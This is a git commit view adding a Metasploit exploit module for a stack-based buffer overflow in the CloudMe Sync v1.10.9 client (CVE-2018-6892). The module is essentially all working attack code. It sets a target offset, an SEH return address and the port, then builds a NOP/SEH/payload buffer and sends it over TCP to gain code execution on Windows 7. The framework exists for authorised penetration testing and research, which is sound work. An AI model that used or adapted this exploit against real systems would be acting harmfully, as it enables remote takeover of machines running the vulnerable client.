Browse Source

CloudMe Sync Client BoF

Daniel Teixeira 2 years ago
parent
commit
745ad4d727
No account linked to committer's email address
1 changed files with 69 additions and 0 deletions
  1. 69
    0
      modules/exploits/windows/misc/cloudme_sync.rb

+ 69
- 0
modules/exploits/windows/misc/cloudme_sync.rb View File

@@ -0,0 +1,69 @@
1
+##
2
+# This module requires Metasploit: https://metasploit.com/download
3
+# Current source: https://github.com/rapid7/metasploit-framework
4
+##
5
+
6
+class MetasploitModule < Msf::Exploit::Remote
7
+  Rank = GreatRanking
8
+
9
+  include Msf::Exploit::Remote::Tcp
10
+  include Msf::Exploit::Remote::Seh
11
+
12
+  def initialize(info = {})
13
+    super(update_info(info,
14
+      'Name'           => 'CloudMe Sync v1.10.9',
15
+      'Description'    => %q{
16
+        This module exploits a stack-based buffer overflow vulnerability
17
+        in CloudMe Sync v1.10.9 client application. This module has been
18
+        tested successfully on Windows 7 SP1 x86.
19
+      },
20
+      'License'        => MSF_LICENSE,
21
+      'Author'         =>
22
+        [
23
+          'hyp3rlinx',      # Original exploit author
24
+          'Daniel Teixeira' # MSF module author
25
+        ],
26
+      'References'     =>
27
+        [
28
+          [ 'CVE', '2018-6892'],
29
+          [ 'EDB', '44027' ],
30
+        ],
31
+      'DefaultOptions' =>
32
+        {
33
+          'EXITFUNC' => 'thread'
34
+        },
35
+      'Platform'       => 'win',
36
+      'Payload'        =>
37
+        {
38
+          'BadChars'   => "\x00",
39
+        },
40
+      'Targets'        =>
41
+        [
42
+          [ 'CloudMe Sync v1.10.9',
43
+            {
44
+              'Offset' => 2232,
45
+              'Ret'    => 0x61e7b7f6
46
+            }
47
+          ]
48
+        ],
49
+      'Privileged'     => true,
50
+      'DisclosureDate' => 'Jan 17 2018',
51
+      'DefaultTarget'  => 0))
52
+
53
+    register_options([Opt::RPORT(8888)])
54
+
55
+  end
56
+
57
+  def exploit
58
+    connect
59
+
60
+    buffer = make_nops(target['Offset'])
61
+    buffer << generate_seh_record(target.ret)
62
+    buffer << make_nops(10)
63
+    buffer << payload.encoded
64
+    buffer << make_nops(5600)
65
+
66
+    sock.put(buffer)
67
+    handler
68
+  end
69
+end

Loading…
Cancel
Save